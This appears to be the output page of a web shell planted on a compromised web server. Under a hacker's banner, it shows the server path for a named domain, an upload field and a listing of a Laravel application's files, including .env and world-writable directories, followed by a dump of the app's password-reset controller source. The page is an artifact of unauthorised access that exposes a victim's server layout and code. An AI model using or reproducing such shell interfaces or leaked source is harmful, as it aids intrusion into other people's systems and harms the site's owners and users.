I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file size edit permission action
.editorconfig276 KBMarch 05 2024 07:12:340666
.env1385 KBMay 24 2024 16:43:550666
.env.example1088 KBMarch 05 2024 07:12:340666
.gitattributes190 KBMarch 05 2024 07:12:340666
.gitignore245 KBMarch 05 2024 07:12:340666
.htaccess947 KBJuly 04 2023 21:25:080664
.rnd1024 KBMarch 13 2024 04:51:140666
README.md472 KBMarch 22 2024 10:35:000666
app-March 05 2024 07:12:340777
artisan1739 KBMarch 05 2024 07:12:340666
bootstrap-March 05 2024 07:12:340777
composer.json2829 KBMay 13 2024 12:10:040666
composer.lock417205 KBMarch 19 2024 12:13:140666
config-July 03 2025 02:53:360777
database-March 05 2024 07:12:340777
index.php1816 KBMay 13 2024 10:32:360666
lang-May 13 2024 14:53:260777
manifest.json913 KBMay 14 2024 03:57:260664
package.json398 KBMarch 05 2024 07:12:340666
phpunit.xml1206 KBMarch 05 2024 07:12:340666
public-July 03 2025 02:37:200777
resources-May 13 2024 12:09:360777
routes-March 05 2024 07:12:340777
service-worker.js924 KBMarch 05 2024 07:12:340666
storage-March 05 2024 10:03:520777
symlink.php218 KBMarch 05 2024 07:12:340666
tests-March 05 2024 07:12:340777
vendor-March 19 2024 12:13:140777
vite.config.js326 KBMarch 05 2024 07:12:340666
validate([ 'credentials' => "required|string|max:100", ]); $column = "username"; if(check_email($request->credentials)) $column = "email"; $user = User::where($column,$request->credentials)->first(); if(!$user) { throw ValidationException::withMessages([ 'credentials' => __("User doesn't exists"), ]); } $token = generate_unique_string("user_password_resets","token",80); $code = generate_random_code(); try{ UserPasswordReset::where("user_id",$user->id)->delete(); $password_reset = UserPasswordReset::create([ 'user_id' => $user->id, 'token' => $token, 'code' => $code, ]); $user->notify(new PasswordResetEmail($user,$password_reset)); }catch(Exception $e) { return back()->with(['error' => [__('Something went wrong! Please try again')]]); } return redirect()->route('user.password.forgot.code.verify.form',$token)->with(['success' => [__('Verification code sended to your email address')]]); } public function showVerifyForm($token) { $page_title = setPageTitle("Verify User"); $password_reset = UserPasswordReset::where("token",$token)->first(); if(!$password_reset) return redirect()->route('user.password.forgot')->with(['error' => [__('Password Reset Token Expired')]]); $resend_time = 0; if(Carbon::now() <= $password_reset->created_at->addMinutes(GlobalConst::USER_PASS_RESEND_TIME_MINUTE)) { $resend_time = Carbon::now()->diffInSeconds($password_reset->created_at->addMinutes(GlobalConst::USER_PASS_RESEND_TIME_MINUTE)); } $user_email = $password_reset->user->email ?? ""; return view('user.auth.forgot-password.verify',compact('page_title','token','user_email','resend_time')); } /** * OTP Verification. * * @param \Illuminate\Http\Request $request * @return \Illuminate\Http\Response */ public function verifyCode(Request $request,$token) { $request->merge(['token' => $token]); $validated = Validator::make($request->all(),[ 'token' => "required|string|exists:user_password_resets,token", 'code' => "required|numeric|exists:user_password_resets,code", ])->validate(); $basic_settings = BasicSettingsProvider::get(); $otp_exp_seconds = $basic_settings->otp_exp_seconds ?? 0; $password_reset = UserPasswordReset::where("token",$token)->first(); if(Carbon::now() >= $password_reset->created_at->addSeconds($otp_exp_seconds)) { foreach(UserPasswordReset::get() as $item) { if(Carbon::now() >= $item->created_at->addSeconds($otp_exp_seconds)) { $item->delete(); } } return redirect()->route('user.password.forgot')->with(['error' => [__('Session expired. Please try again')]]); } if($password_reset->code != $validated['code']) { throw ValidationException::withMessages([ 'code' => "Verification Otp is Invalid", ]); } return redirect()->route('user.password.forgot.reset.form',$token); } /** * Display the specified resource. * * @param int $id * @return \Illuminate\Http\Response */ public function resendCode($token) { $password_reset = UserPasswordReset::where('token',$token)->first(); if(!$password_reset) return back()->with(['error' => ['Request token is invalid']]); if(Carbon::now() <= $password_reset->created_at->addMinutes(GlobalConst::USER_PASS_RESEND_TIME_MINUTE)) { throw ValidationException::withMessages([ 'code' => 'You can resend verification code after '.Carbon::now()->diffInSeconds($password_reset->created_at->addMinutes(GlobalConst::USER_PASS_RESEND_TIME_MINUTE)). ' seconds', ]); } DB::beginTransaction(); try{ $update_data = [ 'code' => generate_random_code(), 'created_at' => now(), 'token' => $token, ]; DB::table('user_password_resets')->where('token',$token)->update($update_data); $password_reset->user->notify(new PasswordResetEmail($password_reset->user,(object) $update_data)); DB::commit(); }catch(Exception $e) { DB::rollback(); return back()->with(['error' => ['Something went wrong! Please try again']]); } return redirect()->route('user.password.forgot.code.verify.form',$token)->with(['success' => [__('Verification code resend success')]]); } public function showResetForm($token) { $page_title = setPageTitle("Reset Password"); return view('user.auth.forgot-password.reset',compact('page_title','token')); } public function resetPassword(Request $request,$token) { $basic_settings = BasicSettingsProvider::get(); $passowrd_rule = "required|string|min:6|confirmed"; if($basic_settings->secure_password) { $passowrd_rule = ["required",Password::min(8)->letters()->mixedCase()->numbers()->symbols()->uncompromised(),"confirmed"]; } $request->merge(['token' => $token]); $validated = Validator::make($request->all(),[ 'token' => "required|string|exists:user_password_resets,token", 'password' => $passowrd_rule, ])->validate(); $password_reset = UserPasswordReset::where("token",$token)->first(); if(!$password_reset) { throw ValidationException::withMessages([ 'password' => __("Invalid Request. Please try again"), ]); } try{ $password_reset->user->update([ 'password' => Hash::make($validated['password']), ]); $password_reset->delete(); }catch(Exception $e) { return back()->with(['error' => [__('Something went wrong! Please try again')]]); } return redirect()->route('user.login')->with(['success' => [__('Password reset success. Please login with new password')]]); } }